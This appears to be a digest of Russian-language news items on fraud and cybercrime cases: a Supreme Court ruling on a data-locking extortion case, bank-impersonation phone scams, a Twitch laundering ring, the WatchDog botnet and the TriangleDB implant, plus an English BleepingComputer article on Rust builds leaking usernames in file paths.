Потерпевшие в ходе процесса указали, что блокировка информации на серверах лишила бы компанию возможности выполнять взятые на себя обязательства перед партнерами и привела к остановке процессов отгрузки и доставки товаров. Блокировка информационных баз данных создала реальную угрозу наступления тяжких последствий, отмечали свидетели. По их оценкам ущерб мог составить почти полмиллиарда рублей. Поэтому, пояснили представители общества, под воздействием угрозы они перевели на электронный кошелек фигуранта 0,8 единиц криптовалюты.
Примечательно, что на этапе следствия обвиняемому вменялись незаконный доступ к компьютерной информации (272 УК РФ) и вымогательство (163 УК РФ), но гособвинитель попросил о переквалификации вымогательства на грабеж (161 УК РФ) и суд его позицию поддержал.
Назад в будущее
«Из анализа представленной совокупности доказательств и направленности умысла и криминально активных действий подсудимого следует, что (осужденный) открытым способом в электронной переписке высказал безальтернативное требование имущественного характера в адрес представителей ООО о незамедлительной передаче ему денежных средств в размере, превышающем 500 тысяч рублей, угрожая сохранением дальнейшей блокировки компьютерной информации», – поясняется в приговоре.
Первая инстанция отметила, что у нее не вызывает сомнений наличие корыстных побуждений у подсудимого, поскольку целью преступных действий было получение денежного вознаграждения за предоставление ключей для дешифрования и восстановления доступа к заблокированной компьютерной информации.
«Отсутствие законодательной определенности правового статуса «биткоинов» не свидетельствует об отсутствии материального ущерба, поскольку ООО понесло убытки», – указал суд.
Однако суд апелляционной инстанции прекратил уголовное преследование по статье грабеж за отсутствием состава преступления. Также он оставил гражданский иск компании без рассмотрения.
Апелляционная инстанция указала, что выводы суда первой инстанции о квалификации действий по статье 161 УК РФ не основаны на уголовном законе.
«Поскольку по смыслу закона грабеж предполагает нахождение преступника и иных лиц в одном месте, завладение имуществом при грабеже происходит одновременно с высказанной угрозой либо сразу после нее, что и отличает грабеж от вымогательства, при котором умысел виновного направлен на получение требуемого имущества в будущем», – пояснила апелляция.
Учитывая то, что в момент требования о передаче имущества обвиняемый находился в Ростове-на-Дону, а сотрудники ООО – в Томске, а сам шантаж происходил с помощью электронной почты, то суд апелляционной инстанции пришел к выводу, что умысел фигуранта был направлен на получение требуемого имущества в будущем, поскольку в данных условиях направление электронного письма не могло являться средством завладения имуществом.
В связи с чем суд апелляционной инстанции посчитал, что действия не содержат всех признаков как грабежа, так и вымогательства, что исключает привлечение его к уголовной ответственности. Более того, суд признал за хакером право на реабилитацию. Суд кассационной инстанции согласился с этими выводами.
В ВС с представлением обратился замгенпрокурора, который полагает, что гособвинитель ошибочно предложил переквалифицировать действия хакера на грабеж.
Вымогательство или грабеж?
«Если действия, предусмотренные ст. 272 УК РФ, выступали способом совершения иных преступлений (например, модификация охраняемой законом компьютерной информации либо неправомерный доступ к ней осуществлялся с целью совершения кражи или мошенничества) они подлежат квалификации по совокупности с преступлениями, предусмотренными соответствующими статьями УК РФ», – разъясняет ВС со ссылкой на позицию Пленума (пункт 16 Постановления от 15 декабря 2022 года №37).
При изложении в приговоре обстоятельств преступления о неправомерном доступе к компьютерной информации суд фактически признал наличие в действиях фигуранта вымогательства, указав, что требования осужденного сопровождались угрозами сохранения блокировки, уничтожения и повреждения компьютерных систем и имущества организации, обращает внимание ВС.
При этом под воздействием угрозы подсудимый получил биткоин на электронный кошелек, но факт завладения денежными средствами в итоге судебными инстанциями вообще не расценен как преступление, говорится в определении.
ВС считает, что следует согласиться с доводами замгенпрокурора.
Автор протеста, в частности указал, что для оценки угрозы как реальной не имеет значения, выражено ли намерение осуществить ее немедленно либо в будущем. Несмотря на то, что фигурант прямо не угрожал уничтожить или повредить информацию, создание препятствий для доступа к ней в совокупности с выдвинутым условием о снятии блокировки лишь в случае выполнения его требований имущественного характера, фактически является угрозой приведения информации в негодность для использования по назначению, то есть угрозой ее уничтожения, указано в представлении.
«Следует признать, что оставление судами апелляционной и кассационной инстанций без внимания существенных обстоятельств, установленных судом первой инстанции, повлекло нарушение права потерпевшего на защиту своих интересов, что искажает саму суть правосудия и смысл судебного решения как акта правосудия», – подчеркивает высшая инстанция.
В результате Судебная коллегия ВС РФ определила направить уголовное дело на новое рассмотрение со стадии судебного разбирательства в суд первой инстанции. (Дело №88-УДП23-7-К8)
Правоохранительные органы обнаружили организацию двух фиктивных медицинских центров, которые обманывали пожилых жителей, предлагая бесплатное обследование и выявляя у них медицинские проблемы, которые на самом деле не существовали.
Некоторые сотрудники медицинского центра не имели соответствующего образования и использовали психологическое воздействие, чтобы убедить пациентов оплатить дорогостоящее лечение, которое в итоге оказалось не нужным.
Полиция провела обыски в медицинских учреждениях и домах подозреваемых, изъяв доказательства в виде оборудования, компьютеров, документов и денег.
Жители США Рой Блэквуд и Трейор Морган на протяжении крайних двух лет регистрировали огромное количество курьерских аккаунтов, а так же аккаунтов обычных пользователей и таким образом оформляли заказы на доставку еды, которые сами же и принимали.
Так же стоит отметить, что каждому курьеру «Uber Eats» предоставляет предоплаченную карту с $700 на балансе, которые можно использовать для доставки заказов клиентам (скорее всего речь идет сугубо о транспортных расходах), но эти ребята пошли дальше — они обменивали балики на подарочные карты в обычных магазинах (чаще всего в аптечной сети «Walgreens»).
Парни уже бутылированы — полиция предъявила им обвинение в организации мошеннической схемы и крупной краже.
Сотрудники МВД по Республике Саха (Якутия) во взаимодействии с коллегами из Татарстана и УБК МВД России при силовой поддержке бойцов полицейского спецназа и Росгвардии задержали две обособленные группы лиц, участники которых, по предварительной информации, причастны к дистанционным хищениям денежных средств у граждан путём мошенничества. В первую входили двое жителей г. Казани в возрасте 17 лет и 21 года, а во вторую – двое жителей подмосковных Щёлково и Красногорска в возрасте 34 лет и 41 года.
В ходе проведённых обысков полицейские обнаружили и изъяли у подозреваемых так называемые SIM-боксы, около 3 тысяч сим-карт различных операторов и множество банковских платёжных средств, зарегистрированных на третьих лиц, а также сотовые телефоны и другое оборудование. По версии полицейских, найденные технические устройства ранее были использованы для обмана двух уроженок Якутии.
Так, в мае текущего года жительнице республиканской столицы позвонил неизвестный, представившийся сотрудником банка. Он сообщил женщине, что некий аферист пытается похитить деньги с её счёта. Под предлогом сохранности финансов собеседник убедил потерпевшую перевести на «безопасный счёт» 10 млн рублей. По аналогичной схеме была обманута и жительница г. Мирного, лишившаяся около 2 млн рублей.
По данным фактам были возбуждены уголовные дела по признакам преступления, предусмотренного частью 4 статьи 159 Уголовного кодекса Российской Федерации, расследование которых продолжается.
В настоящее время сотрудники полиции устанавливают роли подозреваемых в совершении преступлений, их возможных соучастников и причастность к другим аналогичным мошенничествам.
Прокуратура Фрунзенского района Минска возбудила уголовное дело в отношении 16-летнего минчанина, который разработал программу по похищению бонусных баллов и воспользовался ей, сообщает БЕЛТА со ссылкой на службу информации прокуратуры города Минска.
Подросток обвиняется в хищении имущества путем модификации компьютерной информации. По материалам дела минчанин 22 мая в одном из сетевых магазинов купил товар стоимостью более Br320, фактически не расплатившись за него. Дело в том, что произошла манипуляция с бонусными баллами: в магазине подросток предоставил продавцу бонусную карту для расчета баллами, сразу же переведя их на другую карту, таким образом не расходовав их.
Для получения бонусных баллов молодой человек использовал специально разработанную им программу, которая предназначалась для привязки неограниченного количества бонусных карт, держателями которых были покупатели торговой сети, к подконтрольным ему аккаунтам и последующего перевода имеющихся на этих бонусных картах баллов ему.
Для организации предварительного расследования уголовное дело направлено во Фрунзенский (Минска) районный отдел Следственного комитета.
Турецкая полиция задержала 18 человек по обвинению в экономических преступлениях. По данным правоохранительных органов, все они являются участниками преступной группы, которая отмывала краденые деньги через стриминговую платформу Twitch. Об этом сообщил сайт турецкого издания Daily Sabah.
Расследование дела началось после утечки доходов стримеров из документов Twitch — данные были опубликованы хакерами в октябре 2021 года. Выяснилось, что некоторые контент-мейкеры получают значительно большие доходы, чем в среднем зарабатывают каналы с аналогичной аудиторией. Позже стало известно, что многие из них были участниками преступной схемы. Они получали донаты во внутренней валюте Twitch под названием Bits, купленной с краденых кредитных карт, и после вывода денег с платформы 80% полученного дохода возвращали донатеру.
В январе в Турции уже арестовывали по аналогичным обвинениям 40 человек. По информации полиции, на свободе остаётся ещё один обвиняемый из преступной группы, его поиски продолжаются. Кроме того, в ноябре 2021 года администрация Twitch удалила 150 каналов из Турции. По подсчётам компании, они отмыли около $9,8 млн.
Уголовные дела о мошенничестве, организации преступного сообщества возбудили в Уфе в отношении группы из семи человек, которая обналичила более 4,3 млрд рублей за счет фиктивных организаций. Деньги были получены в результате уклонения от уплаты налогов и других нарушений, сообщили журналистам в пресс- службе управления ФСБ по региону в среду.
"Установлено, что семь жителей Уфы с использованием 80 подконтрольных фиктивных организаций обналичивали более 4,3 млрд рублей, полученные в результате мошеннических действий и уклонения от уплаты налогов в особо крупном размере. ГСУ МВД по РБ на основании материалов УФСБ возбуждено шесть уголовных дел по признакам преступлений, предусмотренных ч. 1, 2 ст. 210 "Организация преступного сообщества или участие в нем", ч. 4 ст. 159 "Мошенничество", ч. 2 ст. 173.1 "Незаконное образование юридического лица" УК РФ", - говорится в сообщении.
Один из обвиняемых 1985 года рождения заключил досудебное соглашение и дал показания в отношении остальных участников преступного сообщества. Советским районным судом Уфы он признан виновным в организации преступного сообщества или участии в нем (ч. 2 ст. 210), незаконной банковской деятельности (ч. 2 ст. 172), незаконном образовании юридического лица (ч. 2 ст. 173.1 УК РФ) с назначением наказания в виде лишения свободы сроком на пять лет условно. "В отношении остальных членов организованного преступного сообщества судом продолжается рассмотрение материалов уголовных дел", - добавили в пресс- службе.
СК РФ предлагает снизить размер ущерба для наступления уголовной ответственности по киберпреступлениям, сообщил председатель СК Александр Бастрыкин на открытии международного молодежного юридического форума в Петербурге.
"Мы полагаем, что целесообразно, в частности, пересмотреть в сторону понижения размер ущерба, относящийся к крупному, закрепленный в статье 272 УК РФ ("Неправомерный доступ к компьютерной информации"). Речь идет о том, чтобы понизить размер причиненного ущерба, чтобы наступила уголовная, а не административная ответственность за киберпреступления", - сказал Бастрыкин.
По словам Бастрыкина, эта инициатива уже получила поддержку в Совете Федерации, где действует соответствующая рабочая группа.
В настоящее время по ч. 2 ст. 272 УК РФ грозит ответственность, если неправомерный доступ к компьютерной информации повлек крупный ущерб (в размере свыше 1 млн рублей) или это преступление было совершено из корыстной заинтересованности. За это предусмотрено до четырех лет лишения свободы. Ответственность по ч. 1 этой статьи наступает в случае уничтожения, блокирования, модификации или копирования информации, за это грозит до двух лет лишения свободы.
Кроме того СК предлагает усилить санкции по ст. 159.3, 159.6 УК РФ в делах о мошенничестве с использованием электронных средств платежа и мошенничестве в сфере компьютерной информации, посредством которых обманывают пожилых людей и даже достаточно грамотных и молодых людей.
Напомним, что в 2020 году СК РФ расследовал 15 тысяч киберпреступлений. По данным Генпрокуратуры, в минувшем году число IT-преступлений использованием информационно-коммуникационных технологий выросло на 74%, с 294 тысяч до 510 тысяч.
Трое украинских заключенных вступили в сговор, в результате которого в течение 1,5 лет промышляли интернет-мошенничеством и завладели деньгами жертв на сотни тысяч гривен. Обладая соответствующими знаниями и навыками, они связывались с гражданами от имени служб безопасности украинских банков и, внушив жертвам доверие, получали доступ к их деньгам.
Как удалось выяснить правоохранителям, в группировку входили четверо установленных лиц, их родственники, находящиеся на свободе, а также ряд пока неустановленных следствием граждан. Постановлением суда правоохранители смогли добиться заключения под стражу для одного из участников группировки, находившегося на свободе.
Данный тюремный колл-центр действовал на территории нашей страны с 2019 года. Сообщники использовали мобильные телефоны с различными сим-картами, обзванивали клиентов украинских банков и представлялись сотрудниками службы безопасности Приватбанка.
Легенда, которую использовали злоумышленники была следующей: некие мошенники получили доступ к вашей банковской карте и сделали с ее помощью крупный заказ в интернет-магазине «Розетка». Для того, чтобы отменить заказ, вернуть деньги и восстановить контроль над аккаунтом в интернет-банке, нужно снять все деньги и временно перевести их на «промежуточный счет» (принадлежащий мошенникам).
В первом эпизоде, один из мошенников, представившись техническим специалистом Приватбанка, сообщил потерпевшей, что деньги нужно переслать на мобильный счет. Таким образом женщина совершила через банкомат пополнение мобильного номера мошенника на 1600 гривен.
Еще одной жертве мошенник также рассказал про несанкционированную покупку в Розетке и велел подойти к банкомату ждать инструкций от другого сотрудника. Вскоре перезвонил сообщник и стал диктовать реквизиты, по которым нужно перевести деньги, чтобы отменить несанкционированный заказ и вернуть деньги.
Перепуганная жертва обналичила деньги со всех своих карт, включая кредитные средства и перевела их (76 тыс.) через терминал IBox на указанный мошенниками счет.
Другой потерпевший, запуганный мошенниками по телефону, сообщил липовой «службе безопасности» все свои данные карты, код безопасности, пароль на вход в интернет-банк и одноразовые смс-пароли, а также сделал пару переводов на счета мошенников - 60 и 50 тысяч гривен.
В ходе досудебного расследования, правоохранители установили ряд эпизодов, в которых сумма нанесенного ущерба составила около 250 тыс. гривен. Все эти деньги помогали обналичивать пособники с воли (близкие родственники и знакомые). Полученные деньги они передавали на зону в виде продуктов, вещей и пополнения мобильных телефонов.
Поскольку нанесенный ущерб оценивается как особо крупный, подозреваемым инкриминируют особо тяжкое преступление. В рамках досудебного расследования о действиях данной преступной группировки, вынесено судебное постановление о взятии под стражу одного из участников, многократно судимого ранее, но сейчас находившегося на свободе.
Следствие продолжается.
Rust developers have repeatedly raised concerned about an unaddressed privacy issue over the last few years.
Rust has rapidly gained momentum among developers, for its focus on
performance, safety, safe concurrency, and for having a similar syntax to C++.
However, for the longest time developers have been bothered by their
production builds leaking potentially sensitive debug information.
In early 2017, a Rust developer filed an [issue](https://github.com/rust-
lang/rust/issues/40374) on the Rust lang's GitHub asking, "How can I stop
rustc [from] including system specific information such as absolute file
paths of the source it's compiled from in the binaries it generates?"
The developer shared some examples of paths retained in their production
builds:
/checkout/src/libcore/option.rs
/home/kfairmasterz
/.cargo/registry/src/github.com-1ecc6299db9ec823/typeable-0.1.2/src/lib.rs
/home/kfairmasterz
/.cargo/registry/src/github.com-1ecc6299db9ec823/openssl-0.9.7/src/ssl/bio.rs
These absolute path names revealed the developer's system username and the
overall structure of directories, including the home directory.
They further expressed in the same thread:
"If it helps, you including user ids like this violates GDPR... so this should be addressed by the rust team."
"In 2020 people care about privacy and this can be a put off like rust- lang/mdBook#847 where people actively worked away from the project due to the disrespect of user privacy," said the developer referring to a Rust project called mdBook.
On a first glance, this "leak" of usernames and absolute paths may seem trivial to a reader.
However, over years, many more developers were left surprised to notice such information being included not just in debug builds but their production Rust builds as well [1, 2, 3, 4, ...] and pushed for a change.
BleepingComputer readers have also reached out to us on more than one occasion sharing their thoughts on the issue.
Since Rust project, at the time, did not fix this issue, some workarounds were proposed by the community members, such as using the "abort upon panic" option, but unfortunately none of these worked.
"I have tried to turn on 'abort' for panic in release profile. Even though this resulted in a smaller binary size, it doesn't wipe out source file names from the binary," stated developer Dmitry Zakablukov in August 2020.
Other proposed workarounds [included](https://github.com/rust- lang/rust/issues/75362#issuecomment-674751142) varying parameters like system time, username, timezone, locale, hostname, and so on.
Interestingly, despite being a privacy risk, the inadvertent inclusion of metadata such as absolute paths may aid computer forensics experts and the law enforcement as the path could reveal system usernames.
Of course, any developer who is aware of this issue can trivially build their Rust applications inside of a container, and use a pseudonymous username to minimize impact from the issue.
This week, a pseudonymous developer chemsaf3 reached out to BleepingComputer reiterating their concern with this issue.
The developer filed yet another [issue](https://github.com/rust- lang/cargo/issues/9311) titled "Registry paths hard coded in binary" on the Rust project's GitHub centering attention back towards this problem.
"Rust lang looks to leak sensitive information unnecessarily in compiled binaries such as system paths and usernames."
"[This] happens in release (production) mode, not just debug, and [there is] no way to remove the info with existing tools."
"People have reported the issue but no action or communication from the Rust team," chemsaf3 told bleepingcomputer[.]
The developer also stated that it remains unknown how many developers shipping Rust applications are likely unaware that their applications are revealing their system paths and usernames.
The developer's main concern was:
"Rust is becoming more and more popular so this can start affecting larger number of developers."
"This behavior is not documented, nor is there a way to prevent the leakage," the developer further told us.
The GitHub request filed by the developer was quickly followed up with a response from Rust team member:
"Thanks for the report! It looks like you found several other issues related to this, so I'm unclear if this issue is covering anything new. It seems like #5505 covers dealing with remapping, can you clarify what is different here?" asked Eric Huss of the Rust team.
Eventually, after the issue resurfaced on Reddit, however, a Google team member Alexis Hunt stepped in on the Rust's GitHub issue:
"I was linked this issue from Reddit, and I got interested as personally having good privacy-preserving defaults is important to me. I spoke informally with some colleagues..."
Hunt summarized some of [developers' concerns](http://github.com/rust- lang/rust/issues/40552#issuecomment-809012730) and shared some ideas on how the problem could be resolved.
"Personally, I think this is important and should be addressed quickly, but I'm not in a position at the moment to follow up and make this happen. I hope someone else can pick this up," continued Hunt.
To understand if Rust considered this a vulnerability or planned on a bug fix, BleepingComputer reached out to the Rust core team for comment.
"We agree that this is a bug worth fixing and will be supporting our teams in solving it," Manish Goregaokar of the Rust team and a senior software engineer at Google told bleepingcomputer[.]
Although at this time, it is not known how or when the Rust team plans on resolving this issue, the increased pressure from the developer community seems to be steering Rust maintainers into an actionable direction.
Как ранее уже отмечали ИБ-эксперты, из-за стремительного роста стоимости криптовалют майнинговых ботнетов становится больше, даже некоторые операторы DDoS-ботнетов сейчас тоже переключились на майнинг. В этом свете активность ботнета WatchDog совсем неудивительна.
Аналитики Palo Alto Networks рассказывают, что эта малварь, активная с 2019 года и написанная на языке Go, заражает системы, работающие под управлением Windows и Linux. Как правило, точкой входа для хакеров становятся устаревшие версии разных корпоративных приложений. По оценкам специалистов, в настоящее время в ботнет входят от 500 до 1000 зараженных систем.
Операторы ботнета используют 33 эксплоита для атак на 32 известные уязвимости в таких продуктах, как:
Так как на зараженных устройствах злоумышленники добывают криптовалюту, их прибыль в настоящее время оценивается в 209 Monero, то есть примерно 32 000 долларов по текущему курсу. Исследователи отмечают, что реальные цифры должны быть намного выше, так как им удалось проанализировать лишь несколько бинарников, а хакеры наверняка использую гораздо больше адресов Monero, чем известно аналитикам.

Хуже того, на зараженных серверах WatchDog обычно работает с правами администратора и, если операторы малвари захотят, она может без труда выполнить сканирование и похитить учетные данные.
Источник: xakep.ru/2021/02/19/watchdog/
Cегодня Европол объявил о закрытии крупного онлайн-маркетплейса Manson Market, который занимался продажей украденных данных в рамках мошенничества. Операция, проведенная немецкими властями, привела к аресту двух подозреваемых и изъятию более 50 серверов, связанных с сервисом. В ходе расследования было собрано более 200 тербайт цифровых доказательств.
Manson Market был создан в 2022 году для торговли украденной информацией, полученной в результате фишинга и вишинга (голосового фишинга). Один из методов мошенничества заключался в звонках жертвам от имени сотрудников банков с целью получения их личных данных. Кроме того, для введения пользователей в заблуждение использовалась сеть фальшивых онлайн-магазинов, которые обманывали посетителей, заставляя их вводить данные для оплаты.
Мошенники использовали маркетплейс для продажи украденных данных, которые сортировались по регионам и балансам счетов, что позволяло им проводить более точечные и эффективные мошеннические операции. Также была выявлена активность на Telegram-канале, где ежедневно бесплатно распространялись данные кредитных карт.
В операции участвовали правоохранительные органы из Австрии, Чехии, Финляндии, Германии, Нидерландов и Польши. Обыски прошли в Германии и Австрии, а инфраструктура, связанная с маркетплейсом, была уничтожена в Германии, Финляндии, Нидерландах и Норвегии. Основные подозреваемые, 27-летний и 37-летний мужчины, были арестованы в Германии и Австрии и находятся сейчас под стражей.
Профессиональный игрок в Fortnite и видеоблогер SerpentAU стал соучастником нескольких мошеннических схем с запуском фейковых мем-коинов на сумму $3,5 млн. Об этом сообщил блокчейн-исследователь ZachXBT.
Согласно выводам ончейн-детектива, SerpentAU причастен к серии взломов аккаунтов крупных брендов и знаменитостей в соцсетях. С помощью захваченных профилей злоумышленники рекламировали мошеннические криптоактивы. Среди жертв последних нескольких месяцев: McDonalds, Wiz Khalifa и Usher.
Деньги от продажи фейковых токенов проходили через криптокошельки, подконтрольные SerpentAU.
ZachXBT также обнаружил, что австралийский геймер делал миллионные ставки на гемблинговых платформах и транслировал этот процесс друзьям. В ходе одной из таких демонстраций SerpentAU по неосторожности показал несколько адресов кошельков, связанных с фейковыми токенами.
В 2020 австралиец попался на использовании запрещенных скриптов в матчах Fortnite. Впоследствии его выгнали из киберспортивной команды, а после вовсе забанили в игре.В 2022 году геймер разнообразил свою карьеру запуском NFT- проекта DAPE, по словам ZachXBT, представлявший собой rug pull. Через два года SerpentAU запустил проект ERROR, который постигла аналогичная судьба.
После публикации первых выводов расследования ZachXBT австралиец начал удалять свои записи из соцсетей. По мнению криптодетектива, SerpentAU пытается замести следы, а список жертв еще пополнится.
Расследователь передал подробности дела одной из пострадавших сторон.Напомним, в октябре ZachXBT помог жертве взлома отследить часть от украденных $6,5 млн.
x.com/zachxbt/status/1861775015382790308
Преступники контролировали компьютеры жертв через программы удаленного доступа.
В результате совместной операции правоохранительных органов Румынии и Молдовы была раскрыта крупная международная преступная группировка, специализировавшаяся на финансовых махинациях в интернете. Преступники обманули более 150 человек на сумму около 15 миллионов леев (примерно 750 000 евро).
Расследование началось в 2022 году после заявления Управления финансового надзора Румынии. К делу было присоединено 120 уголовных дел из других прокуратур по заявлениям пострадавших.
Схема мошенничества была тщательно продумана. Преступники размещали в интернете рекламу, обещавшую быстрый и значительный доход от небольших инвестиций в акции и криптовалюты. Для убедительности использовались фотографии известных личностей и логотипы банков и экономических изданий.
Когда жертва переходила по ссылке, открывалась поддельная инвестиционная платформа. После регистрации с человеком связывались члены группировки, представлявшиеся финансовыми консультантами или брокерами. Они убеждали перевести деньги, обещая гарантированную прибыль.
Для создания видимости законности операций мошенники запрашивали у жертв копии документов и банковских карт. Затем их убеждали установить программы удаленного доступа, якобы для управления инвестициями. На самом деле преступники получали контроль над компьютерами и смартфонами жертв, а также доступ к их банковским счетам и криптокошелькам.
В ходе операции 7 августа 2024 года было проведено более 60 обысков в Молдове. Изъяты компьютеры, оружие, деньги и другие улики. Арестовано 10 автомобилей. Задержаны 12 подозреваемых. Расследование продолжается.
diicot.ro/mass-media/4982-comunicat-de-presa-3-08-08-2024
Компания Google [представила](https://security.googleblog.com/2024/06/virtual- escape-real-reward-introducing.html) инициативу kvmCTF, в рамках которой исследователи безопасности могут получить денежное вознаграждение за выявление уязвимостей в гипервизоре KVM (Kernel-based Virtual Machine). Интерес Google к KVM обусловлен использованием данного гипервизора в сервисе Google Cloud, а также в платформах Android и ChromeOS (CrosVM основан на KVM). Для получения вознаграждения должен быть продемонстрирован взлом специально подготовленного окружения CTF (Capture the Flag) на базе свежего ядра Linux, выполняющего виртуальную машину, доступ к которой предоставляется по заявкам. Атакующему предлагается эксплуатировать уязвимость в подсистеме KVM в ядре Linux, обеспечивающем работу хост-системы в данном окружении.
За выявление ранее неизвестной уязвимости, дающей возможность выйти из виртуальной машины, [предусмотрена](https://github.com/google/security- research/blob/master/kvmctf/rules.md) выплата 250 тысяч долларов, а за уязвимости, позволяющей осуществить запись в произвольную область памяти, - 100 тысяч долларов. За уязвимости, приводящие к чтению из произвольной области памяти или записи в смежные области памяти, заявлена выплата 50 тысяч долларов, за DoS-уязвимость - 20 тысяч долларов, а за чтение из смежной области памяти - 10 тысяч долларов. Вознаграждение за запись или чтение произвольной области памяти можно получить изменив или получив значение конкретного адреса в памяти, а в случае смежной области - за ошибки, распознаваемые отладочным инструментом KASAN (Kernel address sanitizer), такие как переполнение буфера или обращение к уже освобождённой области памяти. Вознаграждение за DoS-уязвимость выплачивается при выявлении разыменования нулевого указателя (null-ptr-deref в KASAN).
Екатеринбургского правозащитника Алексея Соколова арестовали на пять суток, обвинив в демонстрации символики экстремистских организаций. Такое постановление сегодня вынесла судья Ленинского суда Екатеринбурга Юлия Лобанова.
Поводом для составления протокола по части 1 статьи 20.3 КоАП (публичная демонстрация символики экстремистских организаций) стало размещение в подвале сайта «Правозащитники Урала» гиперссылки на страницу организации в соцсети Facebook*, оформленную в виде кнопки с логотипом соцсети, рассказал «Вечерним ведомостям» адвокат Роман Качанов.
Алексей Соколов специализируется на защите прав заключённых, неоднократно он выигрывал суды у ГУФСИН по Свердловской области. В 2015 году возглавляемая им ассоциация «Содействие в правовой защите населения "Правовая основа"» была внесена Минюстом РФ в реестр иноагентов. В 2019 году Соколову удалось добиться исключения организации из реестра, однако юрлицо не смогло продолжить деятельность из-за многочисленных штрафов, накопившихся за этот период.
*является продуктом транснациональной холдинговой компании Meta Platforms Inc., чью деятельность по реализации социальных сетей на территории РФ запретил Тверской районный суд Москвы по основаниям осуществления экстремистской деятельности.
source: leninskyeka-- svd.sudrf.ru/modules.php?name=sud_delo&srv_num=1&name_op=case&case_id=364952817&case_uid=421f2226-e8db-4da4-9850-dacbf44f7510&delo_id=1500001
На протяжении нескольких лет исследователи обнаруживали случаи заражения устройств на базе iOS целевым вредоносным ПО, таким как Pegasus, Predator, Reign и другим. Часто процесс заражения устройства включал в себя работу целой цепочки различных эксплойтов, например, для побега из песочницы iMessage при обработке вредоносного вложения, а также для получения root-привилегий через уязвимость в ядре. В силу этого обнаружение одного звена цепочки часто не приводит к раскрытию всех используемых в ходе атаки компонентов. Например, в 2021 году при помощи анализа резервных копий iTunes удалось получить вложение с эксплойтом [FORCEDENTRY](https://citizenlab.ca/2021/09/forcedentry-nso- group-imessage-zero-click-exploit-captured-in-the-wild/). Однако после эксплуатации уязвимости вредоносный код скачивал с удалённого сервера полезную нагрузку, которая была недоступна во время анализа. В результате этого [исследователи потеряли](https://googleprojectzero.blogspot.com/2022/03/forcedentry-sandbox- escape.html) «возможность исследования дальнейшей цепочки заражения».
Во время исследования «Операции Триангуляция» мы поставили цель получить как можно больше компонентов цепочки заражения. На достижение этой цели ушло около полугода, и после завершения сбора мы приступили к анализу всех обнаруженных компонентов. На данный момент мы завершили анализ шпионского импланта, о котором и пойдет речь в этой статье.
Имплант TriangleDB написан на Objective-C – языке программирования, который при компиляции сохраняет имена, которые разработчики присвоили методам и атрибутам классов. В исполняемом файле импланта имена методов необфусцированы, однако имена атрибутов классов представляют собой неинформативные аббревиатуры, что затрудняет понимание их предназначения.
В некоторых случаях всё же можно догадаться, что значат сокращения. Например, osV — версия iOS, а iME — IMEI-идентификатор устройства.
Строки в импланте закодированы в шестнадцатеричном виде и зашифрованы алгоритмом Rolling XOR.
Анализ - https://securelist.ru/triangledb-triangulation-implant/107612/
Следователи Оренбургского линейного отдела МВД России на транспорте направили в суд уголовное дело в отношении троих уроженок Саратовской области, 1991, 1995 и 1998 годов рождения, которые подозреваются в мошенничестве, совершенном группой лиц по предварительному сговору.
Из материалов дела следует, что в сети Интернет женщины размещали объявления об оказании услуг интимного характера, находили потенциальных клиентов, после чего, получая от них аванс, который варьировался в размере от одной до сорока тысяч рублей, прекращали переписку со своими жертвами.
Всего от противоправных действий обвиняемых пострадали 19 человек, из числа жителей Оренбургской, Саратовской, Кемеровской и Московской областей, а также Краснодарского края. Совокупный ущерб, причиненный гражданам, превысил 215 000 рублей.
В переписке с потерпевшими дамы соблюдали строгие меры конспирации, используя сим-карты различных операторов и разные устройства. В общении с мужчинами они никогда не говорили на какие-то личные темы, не называли своих реальных имен, а по завершении диалога стирали информацию о звонке из памяти мобильного устройства.
Впрочем, все эти ухищрения не помещали оперуполномоченным уголовного розыска выйти на след злоумышленниц, а следователям Оренбургского ЛО МВД России на транспорте возбудить и расследовать уголовное дело по признакам преступления, предусмотренного частью 2 статьи 159 УК РФ «Мошенничество».
Накануне из транспортной полиции материалы с утвержденным прокурором обвинительным заключением были направлены в Аткарский городской суд Саратовской области для рассмотрения по существу.
Следователем Главного следственного управления ГУ МВД России по Кемеровской области завершено расследование уголовного дела, возбужденного в отношении 36-летнего жителя Новосибирска. Он обвиняется в совершении трех преступлений, предусмотренных ч. 4 ст. 159 УК РФ «Мошенничество».
В ходе следствия установлено, что обвиняемый, действуя в составе группы, путем обмана в период с мая по июнь 2022 года похитил у троих кузбассовцев в общей сложности более 15 млн рублей. Его жертвами стали жители Междуреченска, Киселевска и Кемерова.
Злоумышленники звонили потерпевшим от имени сотрудников службы безопасности банка, убеждали, что в отношении граждан совершаются мошеннические действия, неправомерно оформляются потребительские кредиты, и для защиты предлагали оформить онлайн-займы, после чего перевести деньги на якобы безопасный банковский счет. От организаторов преступной схемы фигурант принял предложение незаконного заработка. Согласно достигнутой договоренности, он приобретал телефоны, устанавливал на них софт, позволяющий подменивать телефонные номера, обналичивал похищенные денежные средства на территории Новосибирска, часть оставляя себе в качестве вознаграждения, а остальные переводил подельникам. Противоправную деятельность фигуранта пресекли сотрудники управления уголовного розыска ГУ МВД России по Кемеровской области, он стал фигурантом уголовного дела. В качестве меры пресечения ему была избрана подписка о невыезде и надлежащем поведении.
Со следствием обвиняемый не сотрудничал, утверждал, будто просто помогал знакомому обналичить деньги. Однако следователем собраны неопровержимые доказательства его причастности к совершению мошенничеств. Проведены обыски по месту его жительства и в автомобиле, изъяты телефоны и компьютерная техника. В рамках следствия проведена компьютерно-техническая экспертиза, установлены номинальные владельцы банковских карт, с помощью которых переводились похищенные деньги. В целях возмещения ущерба наложен арест на имущество фигуранта и 18 банковских счетов – как его личных, так и открытых специально для совершения противоправной деятельности.
В настоящее время собранные следствием материалы направлены на рассмотрение в суд. Санкции инкриминируемой статьи предусматривают в качестве максимальной меры наказания 10 лет лишения свободы.
Полицейские продолжают проведение оперативно-розыскных и следственных мероприятий с целью установления остальных участников группы мошенников.
Новое правительство Афганистана выступает против криптовалют, заявляя, что криптокомпании обманывают своих клиентов.
Власти страны закрыли порядка 16 криптовалютных бирж в западной провинции страны Герат. Этот шаг был предпринят через три месяца после того, как Афганистан запретил торговлю криптовалютами.
Названия закрытых криптобирж не разглашаются, однако местный глава отдела полиции по борьбе с преступностью Сайед Шах Саадат (Sayed Shah Sa’adat) заявил, что центральный банк запретил любую торговлю криптоактивами, поскольку эта практика порождала проблемы и мошенничество. По словам чиновника-силовика, все люди, причастные к местному криптобизнесу, были арестованы, а их торговые площадки закрыты.
После возращения Талибана к власти, финансовое положение граждан страны ухудшилось, поскольку иностранная помощь на миллиарды долларов прекратилась, а американские санкции заморозили иностранные активы правительства. Все это повысило интерес местных жителей к криптовалютам, хотя санкции затруднили покупку цифровых активов.
